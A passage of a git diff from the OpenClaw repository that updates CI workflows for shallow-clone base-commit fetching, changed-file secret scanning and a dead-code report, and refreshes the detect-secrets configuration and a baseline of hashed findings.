diff --git a/.detect-secrets.cfg b/.detect-secrets.cfg index 38912567c9b..e40a4a1689e 100644 --- a/.detect-secrets.cfg +++ b/.detect-secrets.cfg @@ -7,10 +7,6 @@ [exclude-files] # pnpm lockfiles contain lots of high-entropy package integrity blobs. pattern = (^|/)pnpm-lock\.yaml$ -# Generated output and vendored assets. -pattern = (^|/)(dist|vendor)/ -# Local config file with allowlist patterns. -pattern = (^|/)\.detect-secrets\.cfg$ [exclude-lines] # Fastlane checks for private key marker; not a real key. @@ -28,3 +24,5 @@ pattern = "talk\.apiKey" pattern = === "string" # specific optional-chaining password check that didn't match the line above. pattern = typeof remote\?\.password === "string" +# Docker apt signing key fingerprint constant; not a secret. +pattern = OPENCLAW_DOCKER_GPG_FINGERPRINT= diff --git a/.github/actions/ensure-base-commit/action.yml b/.github/actions/ensure-base-commit/action.yml new file mode 100644 index 00000000000..b2c4322aa84 --- /dev/null +++ b/.github/actions/ensure-base-commit/action.yml @@ -0,0 +1,47 @@ +name: Ensure base commit +description: Ensure a shallow checkout has enough history to diff against a base SHA. +inputs: + base-sha: + description: Base commit SHA to diff against. + required: true + fetch-ref: + description: Branch or ref to deepen/fetch from origin when base-sha is missing. + required: true +runs: + using: composite + steps: + - name: Ensure base commit is available + shell: bash + env: + BASE_SHA: ${{ inputs.base-sha }} + FETCH_REF: ${{ inputs.fetch-ref }} + run: | + set -euo pipefail + + if [ -z "$BASE_SHA" ] || [[ "$BASE_SHA" =~ ^0+$ ]]; then + echo "No concrete base SHA available; skipping targeted fetch." + exit 0 + fi + + if git rev-parse --verify "$BASE_SHA^{commit}" >/dev/null 2>&1; then + echo "Base commit already present: $BASE_SHA" + exit 0 + fi + + for deepen_by in 25 100 300; do + echo "Base commit missing; deepening $FETCH_REF by $deepen_by." + git fetch --no-tags --deepen="$deepen_by" origin "$FETCH_REF" || true + if git rev-parse --verify "$BASE_SHA^{commit}" >/dev/null 2>&1; then + echo "Resolved base commit after deepening: $BASE_SHA" + exit 0 + fi + done + + echo "Base commit still missing; fetching full history for $FETCH_REF." + git fetch --no-tags origin "$FETCH_REF" || true + if git rev-parse --verify "$BASE_SHA^{commit}" >/dev/null 2>&1; then + echo "Resolved base commit after full ref fetch: $BASE_SHA" + exit 0 + fi + + echo "Base commit still unavailable after fetch attempts: $BASE_SHA" diff --git a/.github/workflows/auto-response.yml b/.github/workflows/auto-response.yml index 5f20a699944..8fb76b99b9e 100644 --- a/.github/workflows/auto-response.yml +++ b/.github/workflows/auto-response.yml @@ -49,6 +49,13 @@ jobs: message: "Please use [our support server](https://discord.gg/clawd) and ask in #help or #users-helping-users to resolve this, or follow the stuck FAQ at https://docs.openclaw.ai/help/faq#im-stuck-whats-the-fastest-way-to-get-unstuck.", }, + { + label: "r: no-ci-pr", + message: + "Please don't make PRs for test failures on main.\n\n" + + "The team is aware of those and will handle them directly on the codebase, not only fixing the tests but also investigating what the root cause is. Having to sift through test-fix-PRs (including some that have been out of date for weeks...) on top of that doesn't help. There are already way too many PRs for humans to manage; please don't make the flood worse.\n\n" + + "Thank you.", + }, { label: "r: too-many-prs", close: true, diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 199c6a8b1b5..8850f9f53e2 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -21,10 +21,16 @@ jobs: - name: Checkout uses: actions/checkout@v4 with: - fetch-depth: 50 + fetch-depth: 1 fetch-tags: false submodules: false + - name: Ensure docs-scope base commit + uses: ./.github/actions/ensure-base-commit + with: + base-sha: ${{ github.event_name == 'push' && github.event.before || github.event.pull_request.base.sha }} + fetch-ref: ${{ github.event_name == 'push' && github.ref_name || github.event.pull_request.base.ref }} + - name: Detect docs-only changes id: check uses: ./.github/actions/detect-docs-changes @@ -46,10 +52,16 @@ jobs: - name: Checkout uses: actions/checkout@v4 with: - fetch-depth: 50 + fetch-depth: 1 fetch-tags: false submodules: false + - name: Ensure changed-scope base commit + uses: ./.github/actions/ensure-base-commit + with: + base-sha: ${{ github.event_name == 'push' && github.event.before || github.event.pull_request.base.sha }} + fetch-ref: ${{ github.event_name == 'push' && github.ref_name || github.event.pull_request.base.ref }} + - name: Detect changed scopes id: scope shell: bash @@ -75,6 +87,13 @@ jobs: with: submodules: false + - name: Ensure secrets base commit (PR fast path) + if: github.event_name == 'pull_request' + uses: ./.github/actions/ensure-base-commit + with: + base-sha: ${{ github.event.pull_request.base.sha }} + fetch-ref: ${{ github.event.pull_request.base.ref }} + - name: Setup Node environment uses: ./.github/actions/setup-node-env with: @@ -194,25 +213,13 @@ jobs: - name: Enforce safe external URL opening policy run: pnpm lint:ui:no-raw-window-open - # Report-only dead-code scans. Runs after scope detection and stores machine-readable - # results as artifacts for later triage before we enable hard gates. - # Temporarily disabled in CI while we process initial findings. + # Report-only dead-code scan. Runs after scope detection and stores the Knip + # report as an artifact so we can triage findings before enabling hard gates. deadcode: name: dead-code report needs: [docs-scope, changed-scope] - # if: needs.docs-scope.outputs.docs_only != 'true' && (github.event_name == 'push' || needs.changed-scope.outputs.run_node == 'true') - if: false + if: needs.docs-scope.outputs.docs_only != 'true' && (github.event_name == 'push' || needs.changed-scope.outputs.run_node == 'true') runs-on: blacksmith-16vcpu-ubuntu-2404 - strategy: - fail-fast: false - matrix: - include: - - tool: knip - command: pnpm deadcode:report:ci:knip - - tool: ts-prune - command: pnpm deadcode:report:ci:ts-prune - - tool: ts-unused-exports - command: pnpm deadcode:report:ci:ts-unused steps: - name: Checkout uses: actions/checkout@v4 @@ -225,13 +232,13 @@ jobs: install-bun: "false" use-sticky-disk: "true" - - name: Run ${{ matrix.tool }} dead-code scan - run: ${{ matrix.command }} + - name: Run Knip dead-code scan + run: pnpm deadcode:report:ci:knip - name: Upload dead-code results uses: actions/upload-artifact@v4 with: - name: dead-code-${{ matrix.tool }}-${{ github.run_id }} + name: dead-code-knip-${{ github.run_id }} path: .artifacts/deadcode # Validate docs (format, lint, broken links) only when docs files changed. @@ -303,13 +310,34 @@ jobs: - name: Install pre-commit run: | python -m pip install --upgrade pip - python -m pip install pre-commit detect-secrets==1.5.0 + python -m pip install pre-commit - name: Detect secrets run: | - if ! detect-secrets scan --baseline .secrets.baseline; then - echo "::error::Secret scanning failed. See docs/gateway/security.md#secret-scanning-detect-secrets" - exit 1 + set -euo pipefail + + if [ "${{ github.event_name }}" = "push" ]; then + echo "Running full detect-secrets scan on push." + pre-commit run --all-files detect-secrets + exit 0 + fi + + BASE="${{ github.event.pull_request.base.sha }}" + changed_files=() + if git rev-parse --verify "$BASE^{commit}" >/dev/null 2>&1; then + while IFS= read -r path; do + [ -n "$path" ] || continue + [ -f "$path" ] || continue + changed_files+=("$path") + done < <(git diff --name-only --diff-filter=ACMR "$BASE" HEAD) + fi + + if [ "${#changed_files[@]}" -gt 0 ]; then + echo "Running detect-secrets on ${#changed_files[@]} changed file(s)." + pre-commit run detect-secrets --files "${changed_files[@]}" + else + echo "Falling back to full detect-secrets scan." + pre-commit run --all-files detect-secrets fi - name: Detect committed private keys diff --git a/.github/workflows/install-smoke.yml b/.github/workflows/install-smoke.yml index 9dc5d1fb460..36f64d2d6ad 100644 --- a/.github/workflows/install-smoke.yml +++ b/.github/workflows/install-smoke.yml @@ -19,9 +19,15 @@ jobs: - name: Checkout uses: actions/checkout@v4 with: - fetch-depth: 50 + fetch-depth: 1 fetch-tags: false + - name: Ensure docs-scope base commit + uses: ./.github/actions/ensure-base-commit + with: + base-sha: ${{ github.event_name == 'push' && github.event.before || github.event.pull_request.base.sha }} + fetch-ref: ${{ github.event_name == 'push' && github.ref_name || github.event.pull_request.base.ref }} + - name: Detect docs-only changes id: check uses: ./.github/actions/detect-docs-changes diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index 30b6363a34d..296660d1014 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -30,7 +30,7 @@ repos: - --baseline - .secrets.baseline - --exclude-files - - '(^|/)(dist/|vendor/|pnpm-lock\.yaml$|\.detect-secrets\.cfg$)' + - '(^|/)pnpm-lock\.yaml$' - --exclude-lines - 'key_content\.include\?\("BEGIN PRIVATE KEY"\)' - --exclude-lines @@ -47,6 +47,8 @@ repos: - '=== "string"' - --exclude-lines - 'typeof remote\?\.password === "string"' + - --exclude-lines + - "OPENCLAW_DOCKER_GPG_FINGERPRINT=" # Shell script linting - repo: https://github.com/koalaman/shellcheck-precommit rev: v0.11.0 diff --git a/.secrets.baseline b/.secrets.baseline index 089515fe250..8066ff84714 100644 --- a/.secrets.baseline +++ b/.secrets.baseline @@ -141,7 +141,8 @@ "\"gateway\\.auth\\.password\"", "\"talk\\.apiKey\"", "=== \"string\"", - "typeof remote\\?\\.password === \"string\"" + "typeof remote\\?\\.password === \"string\"", + "OPENCLAW_DOCKER_GPG_FINGERPRINT=" ] } ], @@ -152,64 +153,32 @@ "filename": ".detect-secrets.cfg", "hashed_secret": "1348b145fa1a555461c1b790a2f66614781091e9", "is_verified": false, - "line_number": 17 + "line_number": 13 }, { "type": "Secret Keyword", "filename": ".detect-secrets.cfg", "hashed_secret": "fe88fceb47e040ba1bfafa4ac639366188df2f6d", "is_verified": false, - "line_number": 19 + "line_number": 15 } ], - "appcast.xml": [ - { - "type": "Base64 High Entropy String", - "filename": "appcast.xml", - "hashed_secret": "2bc43713edb8f775582c6314953b7c020d691aba", - "is_verified": false, - "line_number": 141 - }, - { - "type": "Base64 High Entropy String", - "filename": "appcast.xml", - "hashed_secret": "2fcd83b35235522978c19dbbab2884a09aa64f35", - "is_verified": false, - "line_number": 209 - }, - { - "type": "Base64 High Entropy String", - "filename": "appcast.xml", - "hashed_secret": "78b65f0952ed8a557e0f67b2364ff67cb6863bc8", - "is_verified": false, - "line_number": 310 - } - ], - "apps/android/app/src/test/java/ai/openclaw/android/node/AppUpdateHandlerTest.kt": [ + "apps/android/app/src/test/java/ai/openclaw/app/node/AppUpdateHandlerTest.kt": [ { "type": "Hex High Entropy String", - "filename": "apps/android/app/src/test/java/ai/openclaw/android/node/AppUpdateHandlerTest.kt", + "filename": "apps/android/app/src/test/java/ai/openclaw/app/node/AppUpdateHandlerTest.kt", "hashed_secret": "ee662f2bc691daa48d074542722d8e1b0587673c", "is_verified": false, "line_number": 58 } ], - "apps/ios/Sources/Gateway/GatewaySettingsStore.swift": [ - { - "type": "Secret Keyword", - "filename": "apps/ios/Sources/Gateway/GatewaySettingsStore.swift", - "hashed_secret": "5f7c0c35e552780b67fe1c0ee186764354793be3", - "is_verified": false, - "line_number": 28 - } - ], "apps/ios/Tests/DeepLinkParserTests.swift": [ { "type": "Secret Keyword", "filename": "apps/ios/Tests/DeepLinkParserTests.swift", "hashed_secret": "1a91d62f7ca67399625a4368a6ab5d4a3baa6073", "is_verified": false, - "line_number": 89 + "line_number": 105 } ], "apps/macos/Sources/OpenClawProtocol/GatewayModels.swift": [ @@ -218,23 +187,7 @@ "filename": "apps/macos/Sources/OpenClawProtocol/GatewayModels.swift", "hashed_secret": "7990585255d25249fb1e6eac3d2bd6c37429b2cd", "is_verified": false, - "line_number": 1492 - } - ], - "apps/macos/Tests/OpenClawIPCTests/AnthropicAuthResolverTests.swift": [ - { - "type": "Secret Keyword", - "filename": "apps/macos/Tests/OpenClawIPCTests/AnthropicAuthResolverTests.swift", - "hashed_secret": "e761624445731fcb8b15da94343c6b92e507d190", - "is_verified": false, - "line_number": 26 - }, - { - "type": "Secret Keyword", - "filename": "apps/macos/Tests/OpenClawIPCTests/AnthropicAuthResolverTests.swift", - "hashed_secret": "a23c8630c8a5fbaa21f095e0269c135c20d21689", - "is_verified": false, - "line_number": 42 + "line_number": 1745 } ], "apps/macos/Tests/OpenClawIPCTests/GatewayEndpointStoreTests.swift": [ @@ -243,7 +196,7 @@ "filename": "apps/macos/Tests/OpenClawIPCTests/GatewayEndpointStoreTests.swift", "hashed_secret": "19dad5cecb110281417d1db56b60e1b006d55bb4", "is_verified": false, - "line_number": 61 + "line_number": 66 } ], "apps/macos/Tests/OpenClawIPCTests/GatewayLaunchAgentManagerTests.swift": [ @@ -270,7 +223,7 @@ "filename": "apps/shared/OpenClawKit/Sources/OpenClawKit/GatewayChannel.swift", "hashed_secret": "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8", "is_verified": false, - "line_number": 106 + "line_number": 115 } ], "apps/shared/OpenClawKit/Sources/OpenClawProtocol/GatewayModels.swift": [ @@ -279,7 +232,7 @@ "filename": "apps/shared/OpenClawKit/Sources/OpenClawProtocol/GatewayModels.swift", "hashed_secret": "7990585255d25249fb1e6eac3d2bd6c37429b2cd", "is_verified": false, - "line_number": 1492 + "line_number": 1745 } ], "docs/.i18n/zh-CN.tm.jsonl": [ @@ -9611,14 +9564,14 @@ "filename": "docs/channels/feishu.md", "hashed_secret": "b60d121b438a380c343d5ec3c2037564b82ffef3", "is_verified": false, - "line_number": 187 + "line_number": 189 }, { "type": "Secret Keyword", "filename": "docs/channels/feishu.md", "hashed_secret": "186154712b2d5f6791d85b9a0987b98fa231779c", "is_verified": false, - "line_number": 435 + "line_number": 501 } ], "docs/channels/irc.md": [ @@ -9627,7 +9580,7 @@ "filename": "docs/channels/irc.md", "hashed_secret": "d54831b8e4b461d85e32ea82156d2fb5ce5cb624", "is_verified": false, - "line_number": 191 + "line_number": 198 } ], "docs/channels/line.md": [ @@ -9636,7 +9589,7 @@ "filename": "docs/channels/line.md", "hashed_secret": "83661b43df128631f891767fbfc5b049af3dce86", "is_verified": false, - "line_number": 61 + "line_number": 65 } ], "docs/channels/matrix.md": [ @@ -9697,21 +9650,21 @@ "filename": "docs/concepts/memory.md", "hashed_secret": "39d711243bfcee9fec8299b204e1aa9c3430fa12", "is_verified": false, - "line_number": 281 + "line_number": 301 }, { "type": "Secret Keyword", "filename": "docs/concepts/memory.md", "hashed_secret": "1a8abbf465c52363ab4c9c6ad945b8e857cbea55", "is_verified": false, - "line_number": 305 + "line_number": 325 }, { "type": "Secret Keyword", "filename": "docs/concepts/memory.md", "hashed_secret": "b9f640d6095b9f6b5a65983f7b76dbbb254e0044", "is_verified": false, - "line_number": 706 + "line_number": 726 } ], "docs/concepts/model-providers.md": [ @@ -9720,21 +9673,30 @@ "filename": "docs/concepts/model-providers.md", "hashed_secret": "ec3810e10fb78db55ce38b9c18d1c3eb1db739e0", "is_verified": false, - "line_number": 178 + "line_number": 226 }, { "type": "Secret Keyword", "filename": "docs/concepts/model-providers.md", "hashed_secret": "6a4a6c8f2406f4f0843a0a1aae6a320f92f9d6ae", "is_verified": false, - "line_number": 274 + "line_number": 386 }, { "type": "Secret Keyword", "filename": "docs/concepts/model-providers.md", "hashed_secret": "ef83ad68b9b66e008727b7c417c6a8f618b5177e", "is_verified": false, - "line_number": 305 + "line_number": 417 + } + ], + "docs/design/kilo-gateway-integration.md": [ + { + "type": "Secret Keyword", + "filename": "docs/design/kilo-gateway-integration.md", + "hashed_secret": "9addbf544119efa4a64223b649750a510f0d463f", + "is_verified": false, + "line_number": 458 } ], "docs/gateway/configuration-examples.md": [ @@ -9757,21 +9719,21 @@ "filename": "docs/gateway/configuration-examples.md", "hashed_secret": "22af290a1a3d5e941193a41a3d3a9e4ca8da5e27", "is_verified": false, - "line_number": 332 + "line_number": 336 }, { "type": "Secret Keyword", "filename": "docs/gateway/configuration-examples.md", "hashed_secret": "c1e6ee547fd492df1441ac492e8bb294974712bd", "is_verified": false, - "line_number": 431 + "line_number": 439 }, { "type": "Secret Keyword", "filename": "docs/gateway/configuration-examples.md", "hashed_secret": "16c249e04e2be318050cb883c40137361c0c7209", "is_verified": false, - "line_number": 596 + "line_number": 613 } ], "docs/gateway/configuration-reference.md": [ @@ -9780,70 +9742,70 @@ "filename": "docs/gateway/configuration-reference.md", "hashed_secret": "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", "is_verified": false, - "line_number": 149 + "line_number": 199 }, { "type": "Secret Keyword", "filename": "docs/gateway/configuration-reference.md", "hashed_secret": "1188d5a8ed7edcff5144a9472af960243eacf12e", "is_verified": false, - "line_number": 1267 + "line_number": 1611 }, { "type": "Secret Keyword", "filename": "docs/gateway/configuration-reference.md", "hashed_secret": "bde4db9b4c3be4049adc3b9a69851d7c35119770", "is_verified": false, - "line_number": 1283 + "line_number": 1627 }, { "type": "Secret Keyword", "filename": "docs/gateway/configuration-reference.md", "hashed_secret": "7f8aaf142ce0552c260f2e546dda43ddd7c9aef3", "is_verified": false, - "line_number": 1461 + "line_number": 1812 }, { "type": "Secret Keyword", "filename": "docs/gateway/configuration-reference.md", "hashed_secret": "22af290a1a3d5e941193a41a3d3a9e4ca8da5e27", "is_verified": false, - "line_number": 1603 + "line_number": 1985 }, { "type": "Secret Keyword", "filename": "docs/gateway/configuration-reference.md", "hashed_secret": "ec3810e10fb78db55ce38b9c18d1c3eb1db739e0", "is_verified": false, - "line_number": 1631 + "line_number": 2039 }, { "type": "Secret Keyword", "filename": "docs/gateway/configuration-reference.md", "hashed_secret": "c1e6ee547fd492df1441ac492e8bb294974712bd", "is_verified": false, - "line_number": 1862 + "line_number": 2271 }, { "type": "Secret Keyword", "filename": "docs/gateway/configuration-reference.md", "hashed_secret": "45d676e7c6ab44cf4b8fa366ef2d8fccd3e6d6e6", "is_verified": false, - "line_number": 1966 + "line_number": 2399 }, { "type": "Secret Keyword", "filename": "docs/gateway/configuration-reference.md", "hashed_secret": "a219d7693c25cd2d93313512e200ff3eb374d281", "is_verified": false, - "line_number": 2202 + "line_number": 2652 }, { "type": "Secret Keyword", "filename": "docs/gateway/configuration-reference.md", "hashed_secret": "b6f56e5e92078ed7c078c46fbfeedcbe5719bc25", "is_verified": false, - "line_number": 2204 + "line_number": 2654 } ], "docs/gateway/configuration.md": [ @@ -9852,14 +9814,14 @@ "filename": "docs/gateway/configuration.md", "hashed_secret": "a219d7693c25cd2d93313512e200ff3eb374d281", "is_verified": false, - "line_number": 434 + "line_number": 461 }, { "type": "Secret Keyword", "filename": "docs/gateway/configuration.md", "hashed_secret": "b6f56e5e92078ed7c078c46fbfeedcbe5719bc25", "is_verified": false, - "line_number": 435 + "line_number": 462 } ], "docs/gateway/local-models.md": [ @@ -9878,13 +9840,29 @@ "line_number": 124 } ], + "docs/gateway/remote.md": [ + { + "type": "Secret Keyword", + "filename": "docs/gateway/remote.md", + "hashed_secret": "7d852a6979e11c7a40c35c63a2ee96edb2dc2c69", + "is_verified": false, + "line_number": 111 + }, + { + "type": "Secret Keyword", + "filename": "docs/gateway/remote.md", + "hashed_secret": "e1ce9e0c459c8ef30dcadf6fc4e2d50f63a7aa8a", + "is_verified": false, + "line_number": 114 + } + ], "docs/gateway/tailscale.md": [ { "type": "Secret Keyword", "filename": "docs/gateway/tailscale.md", "hashed_secret": "9cb0dc5383312aa15b9dc6745645bde18ff5ade9", "is_verified": false, - "line_number": 81 + "line_number": 86 } ], "docs/help/environment.md": [ @@ -9909,35 +9887,44 @@ "filename": "docs/help/faq.md", "hashed_secret": "491d458f895b9213facb2ee9375b1b044eaea3ac", "is_verified": false, - "line_number": 1412 + "line_number": 1503 }, { "type": "Secret Keyword", "filename": "docs/help/faq.md", "hashed_secret": "a219d7693c25cd2d93313512e200ff3eb374d281", "is_verified": false, - "line_number": 1689 + "line_number": 1780 }, { "type": "Secret Keyword", "filename": "docs/help/faq.md", "hashed_secret": "b6f56e5e92078ed7c078c46fbfeedcbe5719bc25", "is_verified": false, - "line_number": 1690 + "line_number": 1781 }, { "type": "Secret Keyword", "filename": "docs/help/faq.md", "hashed_secret": "ec3810e10fb78db55ce38b9c18d1c3eb1db739e0", "is_verified": false, - "line_number": 2118 + "line_number": 2209 }, { "type": "Secret Keyword", "filename": "docs/help/faq.md", "hashed_secret": "45d676e7c6ab44cf4b8fa366ef2d8fccd3e6d6e6", "is_verified": false, - "line_number": 2398 + "line_number": 2489 + } + ], + "docs/help/testing.md": [ + { + "type": "Secret Keyword", + "filename": "docs/help/testing.md", + "hashed_secret": "e008bed242a21b8279c220f84ba16019a67a9dd4", + "is_verified": false, + "line_number": 94 } ], "docs/install/macos-vm.md": [ @@ -9964,7 +9951,7 @@ "filename": "docs/perplexity.md", "hashed_secret": "6b26c117c66a0c030e239eef595c1e18865132a8", "is_verified": false, - "line_number": 36 + "line_number": 29 } ], "docs/plugins/voice-call.md": [ @@ -9973,7 +9960,7 @@ "filename": "docs/plugins/voice-call.md", "hashed_secret": "cb46980ce5532f18440dff4bbbe097896a8c08c8", "is_verified": false, - "line_number": 239 + "line_number": 254 } ], "docs/providers/anthropic.md": [ @@ -9991,7 +9978,7 @@ "filename": "docs/providers/claude-max-api-proxy.md", "hashed_secret": "b5c2827eb65bf13b87130e7e3c424ba9ff07cd67", "is_verified": false, - "line_number": 80 + "line_number": 86 } ], "docs/providers/glm.md": [ @@ -10025,14 +10012,23 @@ "filename": "docs/providers/minimax.md", "hashed_secret": "ec3810e10fb78db55ce38b9c18d1c3eb1db739e0", "is_verified": false, - "line_number": 71 + "line_number": 70 }, { "type": "Secret Keyword", "filename": "docs/providers/minimax.md", "hashed_secret": "16c249e04e2be318050cb883c40137361c0c7209", "is_verified": false, - "line_number": 140 + "line_number": 149 + } + ], + "docs/providers/mistral.md": [ + { + "type": "Secret Keyword", + "filename": "docs/providers/mistral.md", + "hashed_secret": "ec3810e10fb78db55ce38b9c18d1c3eb1db739e0", + "is_verified": false, + "line_number": 27 } ], "docs/providers/moonshot.md": [ @@ -10041,7 +10037,7 @@ "filename": "docs/providers/moonshot.md", "hashed_secret": "ec3810e10fb78db55ce38b9c18d1c3eb1db739e0", "is_verified": false, - "line_number": 43 + "line_number": 49 } ], "docs/providers/nvidia.md": [ @@ -10059,7 +10055,7 @@ "filename": "docs/providers/ollama.md", "hashed_secret": "e774aaeac31c6272107ba89080295e277050fa7c", "is_verified": false, - "line_number": 33 + "line_number": 37 } ], "docs/providers/openai.md": [ @@ -10068,7 +10064,7 @@ "filename": "docs/providers/openai.md", "hashed_secret": "ec3810e10fb78db55ce38b9c18d1c3eb1db739e0", "is_verified": false, - "line_number": 31 + "line_number": 32 } ], "docs/providers/opencode.md": [ @@ -10111,7 +10107,7 @@ "filename": "docs/providers/venice.md", "hashed_secret": "c179fe46776696372a90218532dc0d67267f2f04", "is_verified": false, - "line_number": 236 + "line_number": 251 } ], "docs/providers/vllm.md": [ @@ -10148,13 +10144,38 @@ "line_number": 27 } ], + "docs/reference/secretref-user-supplied-credentials-matrix.json": [ + { + "type": "Secret Keyword", + "filename": "docs/reference/secretref-user-supplied-credentials-matrix.json", + "hashed_secret": "d6c8cbcbe34bf0e02cf1a52e27afcf18b59b3f79", + "is_verified": false, + "line_number": 22 + }, + { + "type": "Secret Keyword", + "filename": "docs/reference/secretref-user-supplied-credentials-matrix.json", + "hashed_secret": "e9a292f7f4d25b0d861458719c6115de3ec813c3", + "is_verified": false, + "line_number": 40 + } + ], + "docs/start/wizard-cli-automation.md": [ + { + "type": "Secret Keyword", + "filename": "docs/start/wizard-cli-automation.md", + "hashed_secret": "6d9c68c603e465077bdd49c62347fe54717f83a3", + "is_verified": false, + "line_number": 155 + } + ], "docs/tools/browser.md": [ { "type": "Basic Auth Credentials", "filename": "docs/tools/browser.md", "hashed_secret": "9d4e1e23bd5b727046a9e3b4b7db57bd8d6ee684", "is_verified": false, - "line_number": 140 + "line_number": 149 } ], "docs/tools/firecrawl.md": [ @@ -10172,7 +10193,7 @@ "filename": "docs/tools/skills-config.md", "hashed_secret": "c1e6ee547fd492df1441ac492e8bb294974712bd", "is_verified": false, - "line_number": 29 + "line_number": 31 } ], "docs/tools/skills.md": [ @@ -10181,7 +10202,7 @@ "filename": "docs/tools/skills.md", "hashed_secret": "c1e6ee547fd492df1441ac492e8bb294974712bd", "is_verified": false, - "line_number": 198 + "line_number": 200 } ], "docs/tools/web.md": [ @@ -10190,28 +10211,35 @@ "filename": "docs/tools/web.md", "hashed_secret": "6b26c117c66a0c030e239eef595c1e18865132a8", "is_verified": false, - "line_number": 62 + "line_number": 90 }, { "type": "Secret Keyword", "filename": "docs/tools/web.md", - "hashed_secret": "96c682c88ed551f22fe76d206c2dfb7df9221ad9", + "hashed_secret": "4a9fd550cf205ab06ee932f41a132ff53cb83d83", "is_verified": false, - "line_number": 113 + "line_number": 107 + }, + { + "type": "Secret Keyword", + "filename": "docs/tools/web.md", + "hashed_secret": "1ccebc9638f47c80fc388173e346b2fa51178cca", + "is_verified": false, + "line_number": 135 }, { "type": "Secret Keyword", "filename": "docs/tools/web.md", "hashed_secret": "491d458f895b9213facb2ee9375b1b044eaea3ac", "is_verified": false, - "line_number": 161 + "line_number": 179 }, { "type": "Secret Keyword", "filename": "docs/tools/web.md", "hashed_secret": "674397e2c0c2faaa85961c708d2a96a7cc7af217", "is_verified": false, - "line_number": 235 + "line_number": 277 } ], "docs/tts.md": [ @@ -10227,7 +10255,16 @@ "filename": "docs/tts.md", "hashed_secret": "1188d5a8ed7edcff5144a9472af960243eacf12e", "is_verified": false, - "line_number": 100 + "line_number": 101 + } + ], + "docs/vps.md": [ + { + "type": "Base64 High Entropy String", + "filename": "docs/vps.md", + "hashed_secret": "66eba27d45030064a428078cf4d510002a445f27", + "is_verified": false, + "line_number": 60 } ], "docs/zh-CN/brave-search.md": [ @@ -10261,7 +10298,7 @@ "filename": "docs/zh-CN/channels/feishu.md", "hashed_secret": "186154712b2d5f6791d85b9a0987b98fa231779c", "is_verified": false, - "line_number": 445 + "line_number": 509 } ], "docs/zh-CN/channels/line.md": [ @@ -10806,37 +10843,37 @@ "filename": "extensions/bluebubbles/src/actions.test.ts", "hashed_secret": "789cbe0407840b1c2041cb33452ff60f19bf58cc", "is_verified": false, - "line_number": 86 + "line_number": 54 } ], "extensions/bluebubbles/src/attachments.test.ts": [ + { + "type": "Secret Keyword", + "filename": "extensions/bluebubbles/src/attachments.test.ts", + "hashed_secret": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", + "is_verified": false, + "line_number": 79 + }, { "type": "Secret Keyword", "filename": "extensions/bluebubbles/src/attachments.test.ts", "hashed_secret": "789cbe0407840b1c2041cb33452ff60f19bf58cc", "is_verified": false, - "line_number": 21 + "line_number": 90 }, { "type": "Secret Keyword", "filename": "extensions/bluebubbles/src/attachments.test.ts", "hashed_secret": "db1530e1ea43af094d3d75b8dbaf19a4a182a318", "is_verified": false, - "line_number": 85 - }, - { - "type": "Secret Keyword", - "filename": "extensions/bluebubbles/src/attachments.test.ts", - "hashed_secret": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", - "is_verified": false, - "line_number": 103 + "line_number": 154 }, { "type": "Secret Keyword", "filename": "extensions/bluebubbles/src/attachments.test.ts", "hashed_secret": "052f076c732648ab32d2fcde9fe255319bfa0c7b", "is_verified": false, - "line_number": 215 + "line_number": 260 } ], "extensions/bluebubbles/src/chat.test.ts": [ @@ -10845,42 +10882,42 @@ "filename": "extensions/bluebubbles/src/chat.test.ts", "hashed_secret": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", "is_verified": false, - "line_number": 19 + "line_number": 68 }, { "type": "Secret Keyword", "filename": "extensions/bluebubbles/src/chat.test.ts", "hashed_secret": "789cbe0407840b1c2041cb33452ff60f19bf58cc", "is_verified": false, - "line_number": 54 + "line_number": 93 }, { "type": "Secret Keyword", "filename": "extensions/bluebubbles/src/chat.test.ts", "hashed_secret": "5c5a15a8b0b3e154d77746945e563ba40100681b", "is_verified": false, - "line_number": 82 + "line_number": 115 }, { "type": "Secret Keyword", "filename": "extensions/bluebubbles/src/chat.test.ts", "hashed_secret": "faacad0ce4ea1c19b46e128fd79679d37d3d331d", "is_verified": false, - "line_number": 131 + "line_number": 158 }, { "type": "Secret Keyword", "filename": "extensions/bluebubbles/src/chat.test.ts", "hashed_secret": "4dcc26a1d99532846fedf1265df4f40f4e0005b8", "is_verified": false, - "line_number": 227 + "line_number": 239 }, { "type": "Secret Keyword", "filename": "extensions/bluebubbles/src/chat.test.ts", "hashed_secret": "fd2a721f7be1ee3d691a011affcdb11d0ca365a8", "is_verified": false, - "line_number": 290 + "line_number": 302 } ], "extensions/bluebubbles/src/monitor.test.ts": [ @@ -10889,14 +10926,37 @@ "filename": "extensions/bluebubbles/src/monitor.test.ts", "hashed_secret": "789cbe0407840b1c2041cb33452ff60f19bf58cc", "is_verified": false, - "line_number": 278 + "line_number": 169 }, { "type": "Secret Keyword", "filename": "extensions/bluebubbles/src/monitor.test.ts", + "hashed_secret": "891f33ddd2af62f77eab3b7aac8d4874acc093e4", + "is_verified": false, + "line_number": 2394 + }, + { + "type": "Secret Keyword", + "filename": "extensions/bluebubbles/src/monitor.test.ts", + "hashed_secret": "01ee85f364fd0a345244d10a59d73b9f28b2e8da", + "is_verified": false, + "line_number": 2398 + } + ], + "extensions/bluebubbles/src/monitor.webhook-auth.test.ts": [ + { + "type": "Secret Keyword", + "filename": "extensions/bluebubbles/src/monitor.webhook-auth.test.ts", + "hashed_secret": "789cbe0407840b1c2041cb33452ff60f19bf58cc", + "is_verified": false, + "line_number": 169 + }, + { + "type": "Secret Keyword", + "filename": "extensions/bluebubbles/src/monitor.webhook-auth.test.ts", "hashed_secret": "1ae0af3fe72b3ba394f9fa95a6cffc090d726c23", "is_verified": false, - "line_number": 552 + "line_number": 490 } ], "extensions/bluebubbles/src/reactions.test.ts": [ @@ -10905,28 +10965,28 @@ "filename": "extensions/bluebubbles/src/reactions.test.ts", "hashed_secret": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", "is_verified": false, - "line_number": 37 + "line_number": 35 }, { "type": "Secret Keyword", "filename": "extensions/bluebubbles/src/reactions.test.ts", "hashed_secret": "789cbe0407840b1c2041cb33452ff60f19bf58cc", "is_verified": 